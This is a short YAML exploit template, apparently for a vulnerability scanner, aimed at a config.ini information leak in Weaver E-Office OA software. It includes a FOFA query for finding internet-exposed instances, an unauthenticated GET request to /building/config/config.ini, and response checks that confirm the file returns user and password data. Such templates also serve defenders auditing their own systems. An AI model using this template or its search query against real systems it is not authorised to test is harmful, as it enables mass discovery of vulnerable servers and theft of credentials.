product: 泛微E-Office
vName: 泛微E-Office系统config.ini信息泄漏
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,该系统存在敏感信息泄漏漏洞
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://blog.csdn.net/nnn2188185/article/details/136218904
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /building/config/config.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - user
            logic: and
        - body:
            value:
              - password
            logic: and